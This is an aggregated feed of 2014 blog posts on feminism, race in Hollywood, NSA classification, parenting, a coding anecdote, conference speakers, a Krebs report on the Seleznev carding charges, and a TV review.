    This is where we need your help! If we can raise $3,125 by October 22 that means we can mentor a third intern ($6,250). Please spread the word and donate today if you can at: http://debian.ch/opw2014/

    If you'd like to participate as intern, the application deadline is the same (October 22nd). You can find out more on the Debian Wiki.

    TEDNew ideas from a small island: A support group for women in business, inspired by TEDxNicosiaWomen

    A talk at TEDxNicosiaWomen lead to a thriving discussion group for female business leaders on an island where such a thing is a rarity. Photo: Andri Josef/AJPhotoart

    A talk at TEDxNicosiaWomen lead to a thriving discussion group for female business leaders on an island where such a thing is a rarity. Photo: Andri Josef/AJPhotoart

    One morning, as Anna Koukkides-Procopiou was rushing out of her house on the way to the office, her daughter said, “Mommy, I want you here. Why don’t you want me?” This set off a long period of contemplation, and eight months later, she left the business world and reinvented herself as an activist — and started bringing her daughter along with her to meetings.

    “I realized that the problem was actually the solution I didn’t want to see,” she said in a talk at TEDxNicosiaWomen 2013, held on the Mediterranean island of Cyprus.

    Her talk—about how women have to make the decisions that feel right for them—sent a ripple of excitement through the audience.

    “Cyprus is a very small community. It’s a small island,” says Mahi Solomou, who organized TEDxNicosiaWomen and invited Koukkides-Procopiou to speak. “Anna’s talk was so special for the Cyprus community because it got women to think that, at the end of the day, this is your life. Anna was criticized for taking off from the corporate world, but she did what felt right to her. It was a powerful message for the women out there.”

    “She really had a big impact on the audience,” echoes Thalia Iacovou, a designer who was in the audience for this talk. “A lot of people identified with her. After, they were saying, ‘Wow, she’s inspiring. She’s given us a lot to think about.’”

    Just a few hours later, the event screened a session of TEDWomen 2013 in which Sheryl Sandberg gave an update on her classic talk and mentioned the phenomenon of Lean In Circles, small groups where women can meet to talk and support one another. With some urging from Solomou and from TEDxNicosia organizer Paul Koronis, Koukkides-Procopiou decided to launch a similar group, with a Cypriot twist.

    In March, this discussion group convened for the first time in a coffee shop, bringing together 11 women with very different business backgrounds. Koronis and Solomou served as hosts; Koukkides-Procopiou moderated. The purpose of the group: to get the women talking about their experiences, so that they could learn from each other and offer support.

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/1ZIWbfR_OFs?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    Iacovou, who runs a digital brand agency with her husband, says a group like this was desperately needed in Cyprus, as gender parity in the workplace isn’t a tightly held value on the island. “In many places in the world, you start from the assumption that it doesn’t matter what gender you are: if you’re in business, you’re in business. There may be instances when there’s sexism, but those are isolated,” she says. “What we find here is different. When you’re [a woman] in business, you tend to be more isolated in the local community rather than embraced. It’s a little bit intimidating, a little difficult to understand.”

    This mindset has affected her personally, she says: “If I am running a workshop, or a pitch or a presentation, people look at my husband and go, ‘Why isn’t he doing the talking? Why is she doing the talking? She’s really bossy.’ I find myself almost stepping back sometimes and allowing my male counterparts to lead. You have to learn to read people in a different way than you might outside of Cyprus.”

    At the first meeting of the discussion group, things started off awkwardly. The women didn’t quite know what to make of each other. “It was very different from existing societies and clubs in Nicosia,” says Koronis, who was the only man in the room for the meeting. “Women here meet for coffee or for cards, but typically in closed circles of friends who’ve been together for years.”

    But as the meeting progressed, the group began to gel. It’s been going strong ever since, and recently held its eighth meeting. Here’s how it works:

    In the week before a meeting, each member of the group gets an email that describes the next session’s theme, along with a video to watch and some questions to think about. Each meeting begins with everyone giving a short update on what they’ve been up to in the past month. From there, it’s discussion time, the conversation flipping between English and Greek. So far, the group has tackled topics like team dynamics and public speaking—and they’re hosting a session soon about hierarchy in the workplace. As each meeting closes, they talk through action points each member can take.

    The audience, thoroughly rapt at TEDxNicosiaWomen. Photo: Andri Josef/AJPhotoart

    The audience, thoroughly rapt at TEDxNicosiaWomen. Photo: Andri Josef/AJPhotoart

    Iacovou says that the group has been transformative for her. “Listening to all the women talking about how they confidently move forward with things, it’s really shifted my tendency to step back,” she says. “In the months since I’ve been in the group, there have been two or three initiatives that I’ve just jumped on board with, without worrying, ‘Oh, I’m a woman, and how am I going to _______?’ I’ve bonded with people I wouldn’t have had an opportunity to interact with on a daily basis. I’ve gotten a lot of insights, on a personal level and on a professional level.”

    Solomou agrees. “They know about what I’m going through, so they can say, ‘We’ve been through the same thing and suggest this,’” she says. “I’m getting a lot of good advice.”

    Because of the conflict on the island between Greeks and Turks, and because Cyprus did not have a robust university system until recently, many members of the island’s business community have either studied or lived abroad. But many have returned in recent years, even with the recent financial crash, leading to what Koronis, Solomou, and Iacovou describe as an “entrepreneurial wave” — one in which they say women are participating. “For our generation of women, the culture is allowing them to take on more roles,” says Iacovou.

    The Nicosia group has caught the attention of others locally. Koukkides-Procopiou has been contacted by an individual working with the US Embassy in Nicosia, who asked how they could set up a similar group for their employees, and Koronis has had a conversation with an executive manager of a large bank in Athens, who was interested in bringing the idea to Greece.

    Meanwhile, the group continues to thrive. Koukkides-Procopiou is experimenting with what happens when group members are paired up randomly and keep each other on track toward specific goals.

    “Every time I go to these meetings, I get a dose of inspiration,” says Solomou. “Living on a small island, you always need new ideas.”

    Read more about TEDx organizers. And stay tuned for a slew of upcoming events on Cyprus this November. TEDxNicosia will be held on November 1; TEDxUniversityofNicosia on November 15, and TEDxYouth@Nicosia on November 16.

    The stage at TEDxNicosiaWomen. Photo: Andri Josef/AJPhotoart

    The stage at TEDxNicosiaWomen. Photo: Andri Josef/AJPhotoart

     


    Sociological ImagesIs This #HeForShe Video Helping Feminism?

    The United Nations’ #HeForShe campaign had a fantastic launch, with Emma Watson’s impassioned speech deservedly going viral. She stood up and described how everyday sexism continues to discourage girls and women from being strong, physical, and outspoken. And she defended the “feminist” label as a simple demand for sexual equality. But most importantly, she called for solidarity between men and women in achieving it.

    And then this video came out:

    <object height="315" width="560"><param name="movie" value="//www.youtube.com/v/7ZptgM-jhZo?version=3&amp;hl=en_US"/><param name="allowFullScreen" value="true"/><param name="allowscriptaccess" value="always"/><embed allowfullscreen="true" allowscriptaccess="always" height="315" src="//www.youtube.com/v/7ZptgM-jhZo?version=3&amp;hl=en_US" type="application/x-shockwave-flash" width="560"></object>

    On the surface, it looks like a group of men from all walks of life answering Ms. Watson’s call. But delve deeper, and it becomes problematic. For me, anyway.

    I’m a man, and I consider myself a feminist. But when I think about working towards an end to sexism, the last thing I would do is get a group of men to discuss the issue isolated from women. And yet that’s what this video seems to be trying to do.

    It feels like a male encounter group, but obviously highly scripted. The different men describe their commitment to #HeForShe in terms of protective paternalistic stereotypes (“I can’t let my daughters, or my wife, suffer because I didn’t do MY job”) and entitlement (“If we don’t change it, it’s never gonna change.”)

    I realize that men have to be part of the solution, but this video feels like it is saying that men ARE the solution. As if a bunch of bros getting together to share their feelings are going to solve sexism, with no reference to how sisters have been doing it for themselves for over 200 years. They don’t need a heroic male takeover of the women’s movement that helps us all feel proud of ourselves because we are “#NotAllMen.” They need real understanding and support.

    Am I being too harsh? Maybe. But when the one man says, “Understand that it’s not only speaking out FOR women, but WITH women” to a sausage fest, the irony speaks volumes to me.

    I think #HeForShe is a great idea, “a solidarity movement for gender equality that brings together one half of humanity in support of the other of humanity, for the entirety of humanity.”

    So why can’t we do it together? Are men considered to be so sexist already that we need to find a “manly” way to be feminist?

    Here’s an idea: Talk to women about the issue. But more importantly, listen to them about what they experience. There is far more work for us to do together.

    Tom Megginson is a Creative Director at Acart Communications, a Canadian Social Issues Marketing agency. He is a specialist in social marketing, cause marketing, and corporate social responsibility. You can follow Tom at Osocio, where this post originally appeared, and The Ethical Adman Work That Matters.

    (View original at http://thesocietypages.org/socimages)

    RacialiciousBlackface by Another Name? “Painting Down” on Gotham

    The issues for people of color in Hollywood run deep – so much so that we occasionally forget how invested the industry can be in denying opportunities to enter this business.

    Jada Pinkett Smith landed a coveted role on the show as Fish Mooney, a female mob leader:

    GOTHAM: Jada Pinkett Smith as Fish Mooney in the "Selina Kyle" episode of GOTHAM airing Monday, Sept. 29 (8:00-9:00 PM ET/PT) on FOX. ©2014 Fox Broadcasting Co. Cr: Jessica Miglio/FOX

    So we have a black woman on screen in a major role. But what is happening behind the scenes? Are people of color being represented in other parts of the industry, like doing stunt work? Not so, according to Deadline Hollywood:

    After receiving inquiries from Deadline, Warner Bros. has canceled plans to “paint down” a white stunt woman to double for a black actress on its hit Fox show Gotham. On Monday, dark makeup was applied to the face of a white stunt woman in a hair and makeup test in advance of two days of filming next week in New York. After receiving calls from Deadline, WB initially downplayed the significance of the story, but after looking into it said that it had made a “mistake” and would hire a black stunt woman instead.

    Really?

    Deadline continues:

    “Painting down” white stunt performers so that they can pass for black has been going on for decades, even though SAG-AFTRA calls the practice “unacceptable” and “improper.” Blackface went out in the 1930s, but “painting down” white stunt performers goes on to this day, and there is no language in the union’s contract that expressly prohibits it. The union’s contract only requires that stunt coordinators “endeavor” to find stunt performers of the same race and gender as the actors they are doubling. For many black cast and crew members, however, the practice is insulting and demeaning, a holdover from Hollywood’s openly racist past.

    Was the industry so lacking in black talent that it was easier to paint a white woman than hire a black stuntwoman?

    A few minutes of googling netted me a documentary by La Faye Baker about black stunt women in Hollywood:

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/rr-LkiXvF8c" width="560"></iframe>

    Is it because the women featured there aren’t high profile enough?
    The Stuntwomen’s Association of Motion Pictures has three black women on the front page: Nicole Callender,
    Jwaundace Candece and Kelsee L. King Devoreaux.

    No blockbuster experience? Angela Meryl put in work on the sets of Kill Bill, Skyfall, American Gangster, and Pirates of the Caribbean: At World’s End.

    Warner Brothers said:

    “A mistake was made this week in casting a stunt woman for a guest star in a particular scene on the show. The situation has been rectified, and we regret the error.”

    We regret this whole situation.

    The post Blackface by Another Name? “Painting Down” on Gotham appeared first on Racialicious - the intersection of race and pop culture.

    Sociological ImagesHappy Birthday, Louis Althusser!


    Image borrowed from BHL.

    Have a scholar we should commemorate?  Send us a wacky pic and we will!

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at http://thesocietypages.org/socimages)

    CryptogramNSA Classification ECI = Exceptionally Controlled Information

    ECI is a classification above Top Secret. It's for things that are so sensitive they're basically not written down, like the names of companies whose cryptography has been deliberately weakened by the NSA, or the names of agents who have infiltrated foreign IT companies.

    As part of the Intercept story on the NSA's using agents to infiltrate foreign companies and networks, it published a list of ECI compartments. It's just a list of code names and three-letter abbreviations, along with the group inside the NSA that is responsible for them. The descriptions of what they all mean would never be in a computer file, so it's only of value to those of us who like code names.

    This designation is why there have been no documents in the Snowden archive listing specific company names. They're all referred to by these ECI code names.

    Planet Linux AustraliaAndrew Pollock: [life] Day 260: Bedwetting, a morning tea play date, and swim class

    Zoe woke up at something like 3:30am because she'd wet the bed. She hasn't wet the bed since before she turned 4. In fact, I bought a Connie pad and she promptly never wet the bed again. I was actually thinking about stopping using it just last night, so I obviously jinxed things.

    Anyway, she woke up, announced she'd had an accident, and I smugly thought I'd have it all handled, but alas, the pad was too low down, so she'd still managed to wet the mattress, which was annoying. Plan B was to just switch her to the bottom bunk, which still worked out pretty well. I've learned an important lesson about the placement of the Connie pad now.

    Unfortunately for me, it seems that if I get woken up after about 4am, I have a low probability of getting back to sleep, and I'd gotten to bed a bit late the night before, so I only wound up with about 5 hours and felt like crap all day.

    Vaeda and her mum, Francesca came over for a morning tea play date. I'd been wanting an excuse to try out a new scone recipe that I'd discovered, so I cranked out some scones for morning tea.

    Vaeda and Francesca couldn't stay for too long, but it was a nice morning nonetheless. Then we popped out to Woolworths to pick up a $30 gift card that the store had donated towards the weekend sausage sizzle. Not quite 70 kg of free sausages, but better than nothing.

    After we got back, we had some lunch, and I tried to convince Zoe to have a nap with me, without success, but we did have a couple of hours of quietish time, and I got to squeeze in some reading.

    We biked over to swim class and then biked home, and I made dinner. Zoe was pretty tired, so I got her to bed nice and easily. It'll be an early night for me too.

    Worse Than FailureA Stupid Comment

    Paul worked for a branch of the Defence Department in Australia, writing reams of C++ using the standard template libraries on a Linux box. On a typical afternoon, Paul checked some code into CVS with a comment:

    Fixed bug 7551, see issue report 2119. Tinky Winky is my favourite Teletubby.

    The addendum continued a long-running inside joke. At this point, the weird check-in comments were only funny because they were applied so consistently.

    “Hey Paul, come over here a second!”

    Paul’s friend and fellow developer Stan had initiated an impromptu gathering around his desk. Once Paul joined the huddle, Stan turned back to his computer screen. “I’m getting sick of these warning messages. You know, the ones our compiler throws because our namespace names are longer than 256 characters? I have trouble finding the real errors around these things. Do any of you know how to shut them off?”


    What a Tinky Winky might look like
    Paul also has a lovely red purse.

    “I do,” Paul said. “Here, let me show you what I’ve done.”

    Paul supplied the name of a header file he’d been working on recently, then pointed to a line near the top. “See that pragma statement? It’ll suppress those warnings during compile time.”

    // We don&apost need these stupid warning messages PMJ
    #pragma warning( disable : 4507 34 )

    “Oh, cool. I’ll try that,” Stan said. “Thanks, Paul!”

    Life went on.

    The trouble started a few weeks later, during a code review. Paul was asked to attend as an impartial reviewer for a project he had no involvement with. When he sat down in the meeting room, Burt the project manager was already there, giving him narrowed eyes.

    “Paul,” Burt began, “are your initials PMJ?”

    Paul frowned. “Yes… why?”

    “The research scientists on my team are complaining that the word ‘stupid’ appears at the start of almost every header file.”

    “What does this have to do with me?” Paul asked.

    “Well, you’ve been touching all this code.” Burt brought up a Word document on his laptop, which was projected onto a screen in the meeting room. “I compiled some samples the scientists showed me. This right here, for instance…”

    Paul blinked at the offending screenshot, which displayed the following two lines:

    // We don&apost need these stupid warning messages PMJ
     #pragma warning( disable : 4507 34 )

    “Oh! That’s just code for suppressing warning messages during compile time,” Paul said. “I wasn’t the one who put it in here. One of the other developers must’ve copied and pasted it in wholesale.”

    “‘Stupid?’” Burt demanded and accused all at once.

    “That’s just a comment. It doesn’t actually do anything.”

    “It makes the scientists angry,” Burt snapped. “It’s inappropriate- and it’s everywhere! They’re questioning the entire code base and the quality of our in-house software! I think we should take this offline for further discussion.” His glowering lifted as more project members filtered into the room for the code review.

    A few days later, Paul was roped into a meeting with Burt, his own boss, and a very offended research scientist.

    “Stupid! Do you think national defense is stupid?” the scientist fumed. “Do you think I’m too stupid not to notice? What good is the code in that stupid file, anyway?”

    “I didn’t touch all those files,” Paul tried to explain.

    “You initialed every line!” the scientist cried.

    “Check CVS. I wasn’t the one checking in those changes!” Paul returned. “And who cares anyway, it’s just a stupid comment! It doesn’t do anything!”

    “Again with the stupid! It reflects an attitude that is rude and demoralizing. How would you like it if I called your work stupid? Oh wait, I see you already did!”

    “Let’s calm down here,” Paul’s boss intervened. “Paul, you said it’s a comment, right? Taking it out won’t change the behavior?”

    “No, course not.”

    “Well, then that means it’d be no problem for you to remove the word ‘stupid’ wherever it appears in the code base- right?” His boss smiled with the glow of a self-assured master diplomat.

    It turned out Paul’s fellow developers had copied the warning suppression code to hundreds of files. Paul wrote a shell script that nuked all occurrences of the offending word and his initials, which he ran during a couple of code base merges when he had everything checked out.

    Disaster averted- or so Paul thought. Paul’s boss reared his head again a few days later, frowning. “Is Tinky Winky really your favorite Teletubby? If you think you had too many meetings about ‘stupid’, think about how many I had. You’d better edit the log.”

    ,

    LongNowHow We Got To Now: new PBS show starring Steven Johnson

    <iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube-nocookie.com/embed/eLMCtFon6E0?rel=0" width="560"></iframe>

    Tonight, October 15th 02014, former SALT Speaker Steven Johnson’s new TV series premieres on PBS. The show, “How We Got To Now”, is co-produced by PBS and BBC, and focuses on different themes showing how long cumulative efforts can result in massive systemic change. The first of the six episodes, “Clean”, focuses on how sanitary conditions evolved from concept to reality, and how this reality affects public health and entire industries.

    9781846148606Steven Johnson has worked on many different topics throughout his career, and he draws on all of these topics in this series. However, it is his study of the history of technology that anchors the show. One of Steven’s major contributions to this field is popularizing network-based approaches to understanding history and new technologies. For example, to understand the lightbulb, one needs to look beyond Thomas Edison and understand the environmental conditions, contemporaneous technologies, and networks of scientists corresponding across the globe. Once these factors are taken into account, innovation stops looking like “eureka moments” and instead becomes anchored in effective networks, collaborations, and the slow incubation of ideas. In the following animation, Steven Johnson explains this process and how it can help us think about technology and innovation now:

    <iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube-nocookie.com/embed/NugRZGDbPFU?rel=0" width="560"></iframe>

    Check your local listings to watch “How We Got To Now”, and keep a look out for some Long Now references throughout the series.

    Planet Linux Australialinux.conf.au News: Speaker Feature: John Dickinson, Himangi Saraogi

    John Dickinson

    John Dickinson

    Herding Cats: Getting an open source community to work on the same thing.

    2:15pm Thursday 15th January 2015

    John is a familiar sight around the world, he has spoken at many conferences, summits, and meetups, including the OpenStack Summit, OSCON, and LinuxConf Australia.

    He is Director of Technology at SwiftStack. SwiftStack is a technology innovator of private cloud storage for today s applications, powered by OpenStack Object Storage.

    For more information on John and his presentation, see here. You can follow him as @notmyname and don’t forget to mention #lca2015.


    Himangi Saraogi

    Himangi Saraogi

    Coccinelle: A program matching and transformation tool

    1:20pm Wednesday 14th January 2015

    Himangi finds contributing to open source a great learning platform and she herself has been contributing to Linux kernel and has submitted and had many patches accepted.

    She has experience with tools like checkpatch, sparse and coccinelle.

    For more information on Himangi and her presentation, see here. You can follow her as @himangi99 and don’t forget to mention #lca2015.

    Krebs on SecuritySeleznev Arrest Explains ‘2Pac’ Downtime

    The U.S. Justice Department has piled on more charges against alleged cybercrime kingpin Roman Seleznev, a Russian national who made headlines in July when it emerged that he’d been whisked away to Guam by U.S. federal agents while vacationing in the Maldives. The additional charges against Seleznev may help explain the extended downtime at an extremely popular credit card fraud shop in the cybercrime underground.

    The 2pac[dot]cc credit card shop.

    The 2pac[dot]cc credit card shop.

    The government alleges that the hacker known in the underground as “nCux” and “Bulba” was Roman Seleznev, a 30-year-old Russian citizen who was arrested in July 2014 by the U.S. Secret Service. According to Russian media reports, the young man is the son of a prominent Russian politician.

    Seleznev was initially identified by the government in 2012, when it named him as part of a conspiracy involving more than three dozen popular merchants on carder[dot]su, a bustling fraud forum where Bulba and other members openly marketed various cybercrime-oriented services (see the original indictment here).

    According to Seleznev’s original indictment, he was allegedly part of a group that hacked into restaurants between 2009 and 2011 and planted malicious software to steal card data from store point-of-sale devices. The indictment further alleges that Seleznev and unnamed accomplices used his online monikers to sell stolen credit and debit cards at bulba[dot]cc and track2[dot]name. Customers of these services paid for their cards with virtual currencies, including WebMoney and Bitcoin.

    But last week, U.S. prosecutors piled on another 11 felony counts against Seleznev, charging that he also sold stolen credit card data on a popular carding store called 2pac[dot]cc. Interestingly, Seleznev’s arrest coincides with a period of extended downtime on 2pac[dot]cc, during which time regular customers of the store could be seen complaining on cybercrime forums where the store was advertised that the proprietor of the shop had gone silent and was no longer responding to customer support inquiries.

    A few weeks after Seleznev’s arrest, it appears that someone new began taking ownership of 2pac[dot]cc’s day-to-day operations. That individual recently posted a message on the carding shop’s home page apologizing for the extended outage and stating that fresh, new cards were once again being added to the shop’s inventory.

    The message, dated Aug. 8, 2014, explains that the proprietor of the shop was unreachable because he was hospitalized following a car accident:

    “Dear customers. We apologize for the inconvenience that you are experiencing now by the fact that there are no updates and [credit card] checker doesn’t work. This is due to the fact that our boss had a car accident and he is in hospital. We will solve all problems as soon as possible. Support always available, thank you for your understanding.”

    2pac[dot]cc's apologetic message to would-be customers of the credit card fraud shop.

    2pac[dot]cc’s apologetic message to would-be customers of the credit card fraud shop.

    IT’S ALL ABOUT CUSTOMER SERVICE

    2pac is but one of dozens of fraud shops selling stolen debit and credit cards. And with news of new card breaches at major retailers surfacing practically each week, the underground is flush with inventory. The single most important factor that allows individual card shop owners to differentiate themselves among so much choice is providing excellent customer service.

    Many card shops, including 2pac[dot]cc, try to keep customers happy by including an a-la-carte card-checking service that allows customers to test purchased cards using compromised merchant accounts — to verify that the cards are still active. Most card shop checkers are configured to automatically refund to the customer’s balance the value of any cards that come back as declined by the checking service.

    This same card checking service also is built into rescator[dot]cc, a card shop profiled several times in this blog and perhaps best known as the source of cards stolen from the Target, Sally Beauty, P.F. Chang’s and Home Depot retail breaches. Shortly after breaking the news about the Target breach, I published a lengthy analysis of forum data that suggested Rescator was a young man based in Odessa, Ukraine.

    Turns out, Rescator is a major supplier of stolen cards to other, competing card shops, including swiped1[dot]su — a carding shop that’s been around in various forms since at least 2008. That information came in a report (PDF) released today by Russian computer security firm Group-IB, which said it discovered a secret way to view the administrative statistics for the swiped1[dot]su Web site. Group-IB found that a user named Rescator was by far the single largest supplier of stolen cards to the shop, providing some 5,306,024 cards to the shop over the years.

    Group-IB also listed the stats on how many of Rescator’s cards turned out to be useful for cybercriminal customers. Of the more than five million cards Rescator contributed to the shop, only 151,720 (2.8 percent) were sold. Another 421,801 expired before they could be sold. A total of 42,626 of the 151,720 — or about 28 percent – of Rescator’s cards that were sold on Swiped1[dot]su came back as declined when run through the site’s checking service.

    The swiped1[dot]su login page.

    The swiped1[dot]su login page.

    Many readers have asked why the thieves responsible for the card breach at Home Depot collected cards from Home Depot customers for five months before selling the cards (on Rescator’s site, of course). After all, stolen credit cards don’t exactly age gracefully or grow more valuable over time.

    One possible explanation — supported by the swiped1[dot]su data and by my own reporting on this subject — is that veteran fraudsters like Rescator know that only a tiny fraction of stolen cards actually get sold. Based on interviews with several banks that were heavily impacted by the Target breach, for example, I have estimated that although Rescator and his band of thieves managed to steal some 40 million debit and credit card numbers in the Target breach, they likely only sold between one and three million of those cards.

    The crooks in the Target breach were able to collect 40 million cards in approximately three weeks, mainly because they pulled the trigger on the heist on or around Black Friday, the busiest shopping day of the year and the official start of the holiday shopping season in the United States. My guess is that Rescator and his associates understood all too well how many cards they needed to steal from Home Depot to realize a certain number of sales and monetary return for the heist, and that they kept collecting cards until they had hit that magic number.

    For anyone who’s interested, the investigation into swiped1[dot]su was part of a larger report that Group-IB published today, available here.

    Sociological ImagesHow (Some) Economists Are Like Doomsday Cult Members

    Four years ago, twenty-three economists (mostly conservative) signed a letter to Ben Bernanke warning that the Fed’s quantitative easing policy – adding billions of dollars to the economy – would be disastrous. It would “debase the currency,” create high inflation, distort financial markets, and do nothing to reduce unemployment.

    Four years later, it’s clear that they were wrong (as Paul Krugman never tires of reminding us). Have they changed their beliefs?

    Of course not.

    Bloomberg asked the letter-signers what they now thought about their prophecy.  Here’s the headline: “Fed Critics Say ’10 Letter Warning Inflation Still Right.”
    This despite the actual low inflation:

    2
    I don’t know why I assume that high-level economists would be more likely than some ordinary people to change their ideas to adjust for new facts. Fifty years ago, in The Structure of Scientific Revolutions, Thomas Kuhn showed that even in areas like chemistry and physics, scientists cling to their paradigms even in the face of accumulated anomalous facts. Why should big-shot economists be any different? It also occurs to me that it’s the most eminent in a profession who will be more resistant to change.  After all, it’s the people at the top who have the greatest amount invested in their ideas – publications, reputations, consultantships, and of course ego. Economists call these “sunk costs.”

    So how do they maintain their beliefs?

    Most of the 23 declined to comment; a few could not be reached (including Ronald McKinnon, who died the previous day).  Of those who responded, only one, Peter Wallison at the American Enterprise Institute, came close to saying, “My prediciton was wrong.”

    “All of us, I think, who signed the letter have never seen anything like what’s happened here.”

    Most of the others preferred denial:

    “The letter was correct as stated.” (David Malpass. He worked in Treasury under Reagan and Bush I)

    “The letter mentioned several things… and all have happened.” (John Taylor, Stanford)

    “I think there’s plenty of inflation — not at the checkout counter, necessarily, but on Wall Street.” (Jim Grant of “Grant’s Interest Rate Observer.” Kinda makes you wonder how closely he’s been observing interest rates.)

    Then there was equivocation. After Thursday night’s debacle – Giants 8, Pirates 0, knocking Pittsburgh out of the playoffs– someone reminded me, “Hey, didn’t you tell me that the Pirates would win the World Series?”

    “Yes, but I didn’t say when.”

    Some of the letter-signers used this same tactic, and just about as convincingly.

    “Note that word ‘risk.’ And note the absence of a date.” (Niall Ferguson, Harvard)

    “Inflation could come…” (Amity Shlaes, Calvin Coolidge Memorial Foundation)

    The 1954 sociology classic When Prophecy Fails describes group built around a prediction that the world would soon be destroyed and that they, the believers, would be saved by flying saucers from outer space.  When it didn’t happen, they too faced the problem of cognitive dissonance – dissonance between belief and fact. But because they had been very specific about what would happen and when it would happen, they could not very well use the  denial and equivocation favored by the economists. Instead, they first by claimed that what had averted the disaster was their own faith. By meeting and planning and believing so strongly in their extraterrestrial rescuers, they had literally saved the world. The economists, by contrast, could not claim that their warnings saved us from inflation, for their warning – their predictions and prescriptions – had been ignored by Fed. So instead they argue that there actually is, or will be, serious inflation.

    The other tactic that the millenarian group seized on was to start proselytizing – trying to convert others and to bring new members into the fold.  For the conservative economists, this tactic is practically a given, but it is not necessarily a change.  They had already been spreading their faith, as professors and as advisors (to policy makers, political candidates, wealthy investors, et al.). They haven’t necessarily redoubled their efforts, but the evidence has not given them pause.  They continue to publish their unreconstructed views to as wide an audience as possible.

    That’s the curious thing about cognitive dissonance. The goal is to reduce the dissonance, and it really doesn’t matter how.  Of course, you could change your ideas, but letting go of long and deeply held ideas when the facts no longer co-operate is difficult. Apparently it’s easier to change the facts (by denial, equivocation, etc.). Or, equally effective in reducing the dissonance, you can convince others that you are right. That validation is just as effective as a friendly set of facts, especially if it comes from powerful and important people and comes with rewards both social and financial.

    Jay Livingston is the chair of the Sociology Department at Montclair State University. You can follow him at Montclair SocioBlog or on Twitter.

    (View original at http://thesocietypages.org/socimages)

    RacialiciousMy Fair Selfie?

    by Guest Contributor Deepa

    Hi, my name is Deepa, and I’m excited to be reviewing ABC’s new fall show Selfie for you!

    When I first heard the premise of Selfie, I was pretty skeptical. It was billed as a modern-day version of the musical My Fair Lady, a story that is very much of a specific time and place. Set in London in the early 1910s, the musical (based on George Bernard Shaw’s play Pygmalion) is the story of Eliza Doolittle, a working-class woman who wants to improve her circumstances.

    Enter Professor Henry Higgins, who is one of those unashamedly arrogant and misogynistic assholes that all of us have met at some point. By virtue of his apparent brilliance in the field of phonetics, Eliza decides he is the only one who can help her lose Cockney accent, which, Higgins says, is what truly ties her to her class. With the help of his friend Colonel Pickering (a much more chivalrous but no less patronizing gentleman), Higgins teaches Eliza not only to speak differently, but to conduct herself in high society. But when I found out that the Henry Higgins character would be portrayed not only by a person of color, but by John Cho, I decided I wanted to give it a try.

    Some of my initial uncertainty may have come from the fact that I am a huge My Fair Lady fan. Growing up in the Pacific Northwest region of the United States, I was a first-gen kid with proudly progressive Indian parents. My mom, in particular, grew up in the Indian state of Kerala, which historically had a matrilineal society, and her family prioritized education and career for their sons and daughters. I was raised to be strongly feminist and anti-racist, and to confront my own socioeconomic and educational privilege. And I was also fortunate enough to be surrounded by people who mostly felt the same way.

    As such, my first exposure to overt sexism and classism came from the film version of My Fair Lady, which I’ve loved since I was four years old.

    My Fair Lady is also an obvious product of imperialist Britain. The movie appears to take place in that mythical all-white London that we’ve been shown so many times in popular culture.

    Most of the obvious prejudice relates to class or to the other nationalities within the United Kingdom. There are a few throw- away references to other countries that are casually racist: for one the lyric in “Why Can’t the English?” that the Arabians learn Arabian/which is absolutely frightening – does a phoneticist really not know the language is Arabic?

    And of course there is the fact that Colonel Pickering has just returned from India where, he says, he has been studying their “147 distinct dialects”. Even as a child, I used to yell at the screen that India has thousands of distinct languages let alone dialects, get your facts right, Pickering.

    And yet, it is a film that is beloved to many South Asians that I know, despite racist undertones, because Eliza Doolittle is such a compelling character – and Henry Higgins, while deplorable, is a fascinating foil for her.

    So while Selfie purports to be a modern-day American version of My Fair Lady, it’s not only the time period that is drastically different.

    The show begins by introducing Eliza Dooley (Karen Gillan), who fled from memories of childhood bullying by reinventing herself on social media. Unfortunately, the fix is superficial: she is widely “liked” on Instagram, Facebook, and other forms of social media, but she has no real friends.

    In the opening scene, Eliza, embarrasses herself in front of a plane full of her coworkers when she a) finds out that her office “boyfriend” is in fact a married man, b) throws up into two barf bags in shock, c) gets covered with vomit when the bags break on her way to the bathroom, and d) emerges wearing strategically-wrapped airplane blankets instead of clothing. After her public humiliation, Eliza comes upon a solution to make her way back up from rock bottom.

    At Eliza’s job, the morning staff meeting is all about celebrating the work of marketing genius Henry Higgins (John Cho), who managed to take company’s pediatric nasal spray, which (allegedly!) caused Satanic hallucinations, and successfully rebrand it. Easily my favorite character in this scene is the gleeful and wildly inappropriate CEO (David Harewood), who smacks a kiss onto Henry’s lips (CEO: “You know, I read an article that said Asian men are more comfortable kissing on the lips as a sign of friendship.” What?) and invites Henry to his daughter’s wedding that weekend, asking him to bring a date because “you’re always alone, it’s kind of weird.”

    In my head, John-Cho-as-Henry starts defiantly singing “I’d prefer a new edition of the Spanish Inquisition than to ever let a woman in my life!” but sadly this does not happen.

    Henry returns to his office to find Eliza there with a proposition: if he can rebrand a dangerous pharmaceutical product, can’t he help her change her image? “What,” Henry replies, “you mean be a better person?”

    “Or that,” says Eliza.

    Henry agrees to the challenge of trying to “repackage” Eliza (possibly a reference to My Fair Lady’s Higgins frequently calling Eliza Doolittle “baggage”?), and so the lessons begin. The first: for Eliza to greet the office’s receptionist, Charmonique, and ask her about her day. Note that in an earlier scene, we don’t see Henry take any particular notice of Charmonique either, but all that doesn’t matter!
    Not when this is a perfect opportunity to mansplain common decency to Eliza!

    Charmonique is clearly used to these kinds of micro-aggressions, which she most likely faces frequently as a woman of color working as a receptionist in this office, and when Eliza can’t even remember her name she seems at first to take pity on her. But even Charmonique is rightly upset when Eliza adds, “In my defense, that’s not a real name.” Wonderful, Eliza, that’s totally not an offensive racial stereotype or anything!

    Of course, Henry’s next instruction takes the form of a “test” for Eliza: accompany him to their CEO’s daughter’s wedding, to see if she can behave herself in a social setting. There’s a predictable make under to get Eliza ready for the wedding, which she predictably screws up by making noises on her phone to distract herself from the genuine emotion of the ceremony – as, we learn through a flashback, Eliza has been doing since she was an unpopular child.

